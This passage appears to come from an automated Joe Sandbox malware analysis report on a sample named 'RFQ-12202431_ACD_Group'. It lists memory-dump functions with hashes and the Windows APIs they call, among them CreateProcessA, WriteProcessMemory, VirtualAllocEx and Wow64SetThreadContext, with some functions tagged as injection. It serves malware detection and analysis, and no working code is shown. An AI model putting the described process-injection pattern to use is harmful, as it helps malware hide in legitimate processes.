API ID:
String ID:
API String ID:
Opcode ID: 04d32ad4672647f445fdebd0c1bd9b6d695e08d73841b3470a1036c1bd24c7a5
Instruction ID: b3d4cfe8d3d9267bcc02169507b1bf2735507176abacd9330c7497410e4f8b47
Opcode Fuzzy Hash: 04d32ad4672647f445fdebd0c1bd9b6d695e08d73841b3470a1036c1bd24c7a5
Instruction Fuzzy Hash: 86220570A45228CFEBA4DF69D954BEAB7F2FB89300F1080A9D509A7395DB305E81CF51

Function 06D99F28 Relevance: .3, Instructions: 283COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.390312155751.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d90000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00e22989ff3c707de5a409452891b6ebbfa80c444efa35f842cd8a3bb6dd5635
Instruction ID: 3913209466add89fb97696beff1ee02c8c13584e62e6a5ba804474be2918ec95
Opcode Fuzzy Hash: 00e22989ff3c707de5a409452891b6ebbfa80c444efa35f842cd8a3bb6dd5635
Instruction Fuzzy Hash: 3DC13971E04218CFEFA4DFA6C544BAEB7B2FB49304F1890A9D449A7385CB709985CF61

Function 0706EEC8 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.390312950315.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7050000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e1df3611ea024d8ad1f275f47f0cba420d5493c1f976f1ddd7f5da8ac86e10e
Instruction ID: 4c3e1aeed4261961be63a1bf7037ad1afb6ae693ab31ecf4d4ff25addb72939a
Opcode Fuzzy Hash: 7e1df3611ea024d8ad1f275f47f0cba420d5493c1f976f1ddd7f5da8ac86e10e
Instruction Fuzzy Hash: A6D1D574E00219CFDB58DFA9D994A9DBBB2FF89300F1081A9D409AB365DB31AD81CF50

Function 06C47350 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.390311635643.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c40000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fc2b5c79227d74b22200dc30d4704fa6d5aa82417bf1e2ac11fd51c5b632873
Instruction ID: 7f643b465db83a30d6fb6a401a039b11c97cfb0d365e0d1b40d13d2044ad1306
Opcode Fuzzy Hash: 3fc2b5c79227d74b22200dc30d4704fa6d5aa82417bf1e2ac11fd51c5b632873
Instruction Fuzzy Hash: 6EB1F270E05208CFEB94DFAAD584BDDBBF2BB89300F2490A9D409EB255DB705985CF60

Function 06C47340 Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.390311635643.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c40000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7325bbe25887ca783098996431a83f933c89c2960ddcb6a3feb1c49e66ea4cb6
Instruction ID: 6db47d48d8559dc96558916ac842711fd23ac940a88d50db5c2d5268e406a3e6
Opcode Fuzzy Hash: 7325bbe25887ca783098996431a83f933c89c2960ddcb6a3feb1c49e66ea4cb6
Instruction Fuzzy Hash: 98B1E270E05208CFEB94DFAAD584BDDBBF2BB89304F2490A9D409EB255DB705A85CF50

Function 06D9EED1 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.390312155751.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d90000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd494016d4b8383f0606754de5e8de9055842f13d4598dfa19889bbed4801dd3
Instruction ID: 22265d3c50ca39a58888d41fa4ad2fded5885815f167870481b60b7c3f8b10d7
Opcode Fuzzy Hash: fd494016d4b8383f0606754de5e8de9055842f13d4598dfa19889bbed4801dd3
Instruction Fuzzy Hash: F3812270E14208CFEB94EF69D594BADB7B2BF89300F14906AD419E7396DB309981CF50

Function 06D9EBEB Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.390312155751.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d90000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6844266035329c1e660af5cf2097d23a5f26a6eb4e6f1d5ecf8d66f9d8e98b59
Instruction ID: 050900bb4ebc3d0fe1c0e0942ce5ef5573d9dfc40c425d83456f91d9c89ed308
Opcode Fuzzy Hash: 6844266035329c1e660af5cf2097d23a5f26a6eb4e6f1d5ecf8d66f9d8e98b59
Instruction Fuzzy Hash: 8A713370E54208CFDB94EF68D594BADB7B6EF89300F14906AD11AE3396CB309981CF90

Function 06C411C0 Relevance: 2.6, Strings: 2, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

-, xrefs: 06C4291B
R, xrefs: 06C411ED

Memory Dump Source

Source File: 00000000.00000002.390311635643.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c40000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: -$R
API String ID: 0-3143228895
Opcode ID: 3557ae3007bd82fd10289283b8216523c197e708192b9400a8a8ce479d38e468
Instruction ID: ee876d678fb6ab51f763dabc79fe32f2a34989c656a1ea6b9e3a62cc5e0dd9b0
Opcode Fuzzy Hash: 3557ae3007bd82fd10289283b8216523c197e708192b9400a8a8ce479d38e468
Instruction Fuzzy Hash: 1231DFB4A4522CCFDB60EF20DD98B9DB7B2BF49304F0042D9D509AB251DB315A81DF81

Function 06C414A5 Relevance: 2.5, Strings: 2, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

B, xrefs: 06C414E5
S, xrefs: 06C40DE2

Memory Dump Source

Source File: 00000000.00000002.390311635643.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c40000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: B$S
API String ID: 0-2413125972
Opcode ID: 08cf7a8acb7d3ed8db868600e89166d8437b2d19ce0c03987a5a65c5906e99d3
Instruction ID: edbff144b9fbe244e214482a599e0a21dae199f8ccf2157c91bb78e63363cd88
Opcode Fuzzy Hash: 08cf7a8acb7d3ed8db868600e89166d8437b2d19ce0c03987a5a65c5906e99d3
Instruction Fuzzy Hash: 2401FB74A55228CFDBA5EF24D89879DB7B6FB49714F1051D9A609A7384CB305F84CF00

Function 06E442FF Relevance: 1.7, APIs: 1, Instructions: 205
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06E444E2

Memory Dump Source

Source File: 00000000.00000002.390312647521.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0835738bf8fb32be8a0a55c931eb76d27f92b8f13e9802d4e1cfd832b1cc7e65
Instruction ID: 6afaffb78b87934bf0e2ca9ed71d1292491d33e9e115691431ef7996801096f6
Opcode Fuzzy Hash: 0835738bf8fb32be8a0a55c931eb76d27f92b8f13e9802d4e1cfd832b1cc7e65
Instruction Fuzzy Hash: DD813371E00349DFDF50DFA9D8817AEBBF2EF48314F149529E858A7284D7749882CB81

Function 06E44308 Relevance: 1.7, APIs: 1, Instructions: 201
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06E444E2

Memory Dump Source

Source File: 00000000.00000002.390312647521.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e4c0fd26171bbb1445e18f8d84c21bfafa9bebec9a4f234be042a98476ebece8
Instruction ID: cd1bc709baa47b534807f89d2d639760904913a53640406e00b023d6942da906
Opcode Fuzzy Hash: e4c0fd26171bbb1445e18f8d84c21bfafa9bebec9a4f234be042a98476ebece8
Instruction Fuzzy Hash: 8A812371E00349DFDF50EFA9D8857AEBBF2EF48314F149529E858A7284D7749882CB81

Function 05F187C5 Relevance: 1.6, APIs: 1, Instructions: 147
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CopyFileA.KERNEL32(?,?,?), ref: 05F18915

Memory Dump Source

Source File: 00000000.00000002.390308768872.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f10000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 83ac804839ab58b2f278aaa15eddd5de3026d1ec21598153f983c2962013271f
Instruction ID: f207e06cfb3e501ad5d1961d919b98cb01bdf48ffe61774c0726815a142cdebe
Opcode Fuzzy Hash: 83ac804839ab58b2f278aaa15eddd5de3026d1ec21598153f983c2962013271f
Instruction Fuzzy Hash: 58518871D002599FDB10CFA9CA857EEBBF2FF48760F148529D845E7284DB7898418B85

Function 05F187D0 Relevance: 1.6, APIs: 1, Instructions: 143
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CopyFileA.KERNEL32(?,?,?), ref: 05F18915

Memory Dump Source

Source File: 00000000.00000002.390308768872.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f10000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 0ea08f5f1060c76ac2cfd89390b481b0e0b8011c70171a044440537bc3a0c048
Instruction ID: 053734e40201e91dee80836cf912313d4552a753ae6f774d323c41e8c1cd37c8
Opcode Fuzzy Hash: 0ea08f5f1060c76ac2cfd89390b481b0e0b8011c70171a044440537bc3a0c048
Instruction Fuzzy Hash: C1518771D003599FDB10CFA9C9857EEBBF2FF48760F148529E809AB284DB789841CB85

Function 06E457A0 Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06E45838

Memory Dump Source

Source File: 00000000.00000002.390312647521.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 2548e4e87f254a33c0ea2f12b09eff96ed640d2b641321d810e9a2e28ef09638
Instruction ID: 8e044be868aa3b8361f44271e5365fb3a99989fc2cf3c3b9ea426c2451b52911
Opcode Fuzzy Hash: 2548e4e87f254a33c0ea2f12b09eff96ed640d2b641321d810e9a2e28ef09638
Instruction Fuzzy Hash: EC2146B5D003498FDB10DFA9D985BEEBBF1FF48314F50882AE918A7240D7789954CB64

Function 06E457A8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06E45838

Memory Dump Source

Source File: 00000000.00000002.390312647521.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: d9bdaaabdb4e28be9f20dff985f7e75547f0c9abfb7a5a3eaafc400681199d7e
Instruction ID: b04c8879417bf3262032b0cfda5f528ce8d60741db6b5d7887b869460943427a
Opcode Fuzzy Hash: d9bdaaabdb4e28be9f20dff985f7e75547f0c9abfb7a5a3eaafc400681199d7e
Instruction Fuzzy Hash: 34213671D003499FDB10DFAAD885BEEBBF5FF48314F50882AE918A7240D7789954CBA0

Function 06E45EB3 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06E45F36

Memory Dump Source

Source File: 00000000.00000002.390312647521.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 6fede43f1e07ed94eba6af6f03134cd08a7a3a7910b0c63f3012004ca412d49f
Instruction ID: b6bccc2197718596c117cff8192c19b5abdf0214768c8ba04f9c97e04f2c0bce
Opcode Fuzzy Hash: 6fede43f1e07ed94eba6af6f03134cd08a7a3a7910b0c63f3012004ca412d49f
Instruction Fuzzy Hash: 6F2135B1D003098FDB10DFAAC8857EEBBF4EF48214F64842AD458A7240D7789949CFA5

Function 06E45EB8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06E45F36

Memory Dump Source

Source File: 00000000.00000002.390312647521.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 972e4e31b3cc2738938f1fcb2df0080d7975e8ac124e1da8a79f1e88e47eb088
Instruction ID: 45e673be7326a9e41c9c8f644dcee68f227ff615a0a815af0959d8b6bd822e63
Opcode Fuzzy Hash: 972e4e31b3cc2738938f1fcb2df0080d7975e8ac124e1da8a79f1e88e47eb088
Instruction Fuzzy Hash: CE214771D003098FDB10DFAAC4857EEBBF4EF88324F64842AD458A7240D778A944CFA1

Function 06D9DF38 Relevance: 1.6, APIs: 1, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 06D9DFB4

Memory Dump Source

Source File: 00000000.00000002.390312155751.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d90000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: bfdf1ffc0cad567339570baa3c04e78870e61834a0a5a6fe2f558570b523fe4b
Instruction ID: 411680d20c692b28e50c8d4602ef9877895f88eeb00f9f969c97416b703d2232
Opcode Fuzzy Hash: bfdf1ffc0cad567339570baa3c04e78870e61834a0a5a6fe2f558570b523fe4b
Instruction Fuzzy Hash: E0213871C003499FDB10DFAAC885BEEFBF5EF48320F54842AD519A7240D73895558FA1

Function 06D9DF40 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 06D9DFB4

Memory Dump Source

Source File: 00000000.00000002.390312155751.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d90000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 4c8ec272a836c42c0823e0729da0fcfb0c4fe20fbcceb86ad71c345d8e66d1bf
Instruction ID: e91abf0f946046e490c7bb0bdbedc7be85f10e96eaaada82e810f8f0d41a8c7a
Opcode Fuzzy Hash: 4c8ec272a836c42c0823e0729da0fcfb0c4fe20fbcceb86ad71c345d8e66d1bf
Instruction Fuzzy Hash: B4211571C0034A9FDB10DFAAC885BEEFBF5EF48220F54842AD519A7240D77895558FA1

Function 06E464B0 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06E46526

Memory Dump Source

Source File: 00000000.00000002.390312647521.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9be182ff7361dc6c2947e8f7047315742f6493c91f249cd185c0eb309c86d43d
Instruction ID: 68f18541b4e73c1973da5493d7f3762f089ad428355b1186d6ee66e062ed8b35
Opcode Fuzzy Hash: 9be182ff7361dc6c2947e8f7047315742f6493c91f249cd185c0eb309c86d43d
Instruction Fuzzy Hash: 22114772D003499FDB10DFAAD845BDEBFF5AB48320F14881AE519A7250C739A954CFA0

Function 06B505E0 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 06B50654

Memory Dump Source

Source File: 00000000.00000002.390310829845.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b50000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1d39f19ccbeb765fb6615616998b27463d000bf705881554591931c42a8e3957
Instruction ID: aa3766caa0315340871f4900df18f561b856b1443154dc1c266deeb48303fd86
Opcode Fuzzy Hash: 1d39f19ccbeb765fb6615616998b27463d000bf705881554591931c42a8e3957
Instruction Fuzzy Hash: C611E3B1D003499BDB10DFAAC884BEEFBF5AB88320F54842AD419A7240C7749955CFA5

Function 06B505DF Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 06B50654

Memory Dump Source

Source File: 00000000.00000002.390310829845.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b50000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ba677cd5a7d3d1cab5f92399a53fd8a4fbdd20a157a9df38cb4589237b876972
Instruction ID: 2bc1eebd3209a92762913fb826731823b750ad71fb4daaeffd820e3c5223c14a
Opcode Fuzzy Hash: ba677cd5a7d3d1cab5f92399a53fd8a4fbdd20a157a9df38cb4589237b876972
Instruction Fuzzy Hash: B521E3B1D003499FDB10DFAAD884BEEFBF5AF88320F54842AD459A7240C7759955CFA0

Function 06E464B8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06E46526

Memory Dump Source

Source File: 00000000.00000002.390312647521.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b83e0d5f391f12d23c57ea373439ff6e704a30dfb3ed3932d4e42e45955a136c
Instruction ID: 15b3932a508c550b247737bf80a5fc37166585b8b0fcdeeec590179aac2eaeff
Opcode Fuzzy Hash: b83e0d5f391f12d23c57ea373439ff6e704a30dfb3ed3932d4e42e45955a136c
Instruction Fuzzy Hash: 091126719003499FDB10DFAAD844BEEBBF5AB88320F14881AD519A7250C7799554CFA0

Function 06B515C0 Relevance: 1.3, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 06B51633

Memory Dump Source

Source File: 00000000.00000002.390310829845.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b50000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 30b5aecdd560a125622beba38f16b3f24a56a5c1428ddcf155ad799c8b8cddfc
Instruction ID: 022f7678db1afaea3f1f884a9e73d3851b213aaf2b3f505b4f86f6bd4fad926c
Opcode Fuzzy Hash: 30b5aecdd560a125622beba38f16b3f24a56a5c1428ddcf155ad799c8b8cddfc
Instruction Fuzzy Hash: 3E1156B5D003498FDB10DFAAD844BEEBBF5EB88324F24881AD519A7240C7759555CFA0

Function 06B515C8 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 06B51633

Memory Dump Source

Source File: 00000000.00000002.390310829845.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b50000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 96beebbd7992b29489445dce4468b2647132d1b47e8c0c7f82909878bf199b15
Instruction ID: 075dc2a58e0b761c80da288fff2f1fd258a68854e1755751bb5e245d8d79fa41
Opcode Fuzzy Hash: 96beebbd7992b29489445dce4468b2647132d1b47e8c0c7f82909878bf199b15
Instruction Fuzzy Hash: 15113476D003499FDB10DFAAC844BEEFBF5EB88320F24881AD519A7240C775A554CBA0

Function 06C40E54 Relevance: 1.3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

Strings

M, xrefs: 06C40EC7

Memory Dump Source

Source File: 00000000.00000002.390311635643.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c40000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: c4ea26273d78d1870fb0f8234f898b564ce920eb572bd399e9538f97c668cf96
Instruction ID: aa2b0d781236364e405432fb63d6e43fc6ece45b08819952c154afd962225781
Opcode Fuzzy Hash: c4ea26273d78d1870fb0f8234f898b564ce920eb572bd399e9538f97c668cf96
Instruction Fuzzy Hash: 7011F270D4122ACFDBA6EF24DCA8BACBBB5BF48304F0001EAE419A7251C7344A84CF45

Function 02EA8A76 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

=, xrefs: 02EA8AC9

Memory Dump Source

Source File: 00000000.00000002.390292281283.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ea0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: =
API String ID: 0-2322244508
Opcode ID: bd5be4a8376ed945774df6336fa85b4ed3cb8759bae1c85cbdea52c209757e29
Instruction ID: efae03a994e4ed661791871cfb5358215b9c032698a6adda0e0f19d7501ce4ea
Opcode Fuzzy Hash: bd5be4a8376ed945774df6336fa85b4ed3cb8759bae1c85cbdea52c209757e29
Instruction Fuzzy Hash: ACF03A78C85269CFDB21DF11D894BE8B7B1BB41318F1495EACC15B6281C7715AE9CF00

Function 02EA8DB9 Relevance: 1.3, Strings: 1, Instructions: 19COMMON

Download Yara Rule

Strings

5, xrefs: 02EA8E02

Memory Dump Source

Source File: 00000000.00000002.390292281283.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ea0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: 5
API String ID: 0-2226203566
Opcode ID: 167ace7ca81cd31f5cd4802fca0d742ee75eb7ae86c763919863dca325aeb722
Instruction ID: 4c014fe880791e90e3bd22035cfc8d8a51a857099b4783cdd51d06e79377c04d
Opcode Fuzzy Hash: 167ace7ca81cd31f5cd4802fca0d742ee75eb7ae86c763919863dca325aeb722
Instruction Fuzzy Hash: 24F0C9B4D942198FD760DF25C859789BBF0EB06315F0084D9C54DA7260DB7459C5DF08

Function 06C479B4 Relevance: 1.3, Strings: 1, Instructions: 14COMMON

Download Yara Rule

Strings

G, xrefs: 06C479DA

Memory Dump Source

Source File: 00000000.00000002.390311635643.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c40000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: G
API String ID: 0-985283518
Opcode ID: f1f313e2a1786af2962f4c8d1dbf98375458e4e946d6be41286a0c92d09b6e0f
Instruction ID: e5b3c44a4300e9086297a975fe2f15559b8cf3c46b7957dccf095133002252cb
Opcode Fuzzy Hash: f1f313e2a1786af2962f4c8d1dbf98375458e4e946d6be41286a0c92d09b6e0f
Instruction Fuzzy Hash: 12E0BDB8A09268DFDBA0DF14C880B99B7F2FB49300F1491D5E60CA3340C7309E888F59

Function 06C41F63 Relevance: 1.3, Strings: 1, Instructions: 10COMMON

Download Yara Rule

Strings

*, xrefs: 06C41F8C

Memory Dump Source

Source File: 00000000.00000002.390311635643.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c40000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: *
API String ID: 0-163128923
Opcode ID: d0c46203a69032bf480ad4971f76a6a535fdb099ee349ef21da459c12dd67277
Instruction ID: 39a462d44b79cfb53df1a8eb9cdd3f07cbabb96199e9eb4af337d0c3ef352139
Opcode Fuzzy Hash: d0c46203a69032bf480ad4971f76a6a535fdb099ee349ef21da459c12dd67277
Instruction Fuzzy Hash: 6BD092B4E54268DFCBA5DF20D884B8DB7B4AB06314F1095D9958DB7301DB305E888F42

Function 06C49A42 Relevance: 1.3, Strings: 1, Instructions: 9COMMON

Download Yara Rule

Strings

w, xrefs: 06C49A66

Memory Dump Source

Source File: 00000000.00000002.390311635643.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c40000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: w
API String ID: 0-476252946
Opcode ID: 2d88e1d444d3b682d3d49fcf6bedb6601554a2bd0d47cda54c5c1856de170bd4
Instruction ID: 8c25cfe56dead031b07b59f88a9423f7e95ce414f7f38821075d6c4661cbd29e
Opcode Fuzzy Hash: 2d88e1d444d3b682d3d49fcf6bedb6601554a2bd0d47cda54c5c1856de170bd4
Instruction Fuzzy Hash: 19D09570A98329CFDBA5EF25C994B88B7B4BB82218F1004A9900DAB244CB352AD5CF45

Function 06C3D2C0 Relevance: .7, Instructions: 677COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.390311568260.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c30000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8af5e3822ec04a77212b023c368e9db9940553afc6ee20551fb42d538bc81ffc
Instruction ID: 0870885b64f6836e9790a99a113824291fad609f3605bfaf8bc6c1f070a328b0
Opcode Fuzzy Hash: 8af5e3822ec04a77212b023c368e9db9940553afc6ee20551fb42d538bc81ffc
Instruction Fuzzy Hash: D852F975A002288FDBA4DF69C941BEDBBF2BF88700F1541D9E549A7351DA30AE81CF61

Function 06B81EA8 Relevance: .6, Instructions: 577COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.390310988071.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b80000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f00167a0dd47a54c9ec8eea393f8e14703af66483df01faa1ae9a4b9508a95ad
Instruction ID: 963e0785461d42e580e1b52561616ba3628e2d468cb31a621f9c008010df32d1
Opcode Fuzzy Hash: f00167a0dd47a54c9ec8eea393f8e14703af66483df01faa1ae9a4b9508a95ad
Instruction Fuzzy Hash: A142D6B4E04209CFDF94EFA5C594AAEB7B2FF89301F5080A5DA1667294C7345E42CFA0

Function 06C37820 Relevance: .5, Instructions: 531COMMON

Download Yara Rule

Memory Dump Source

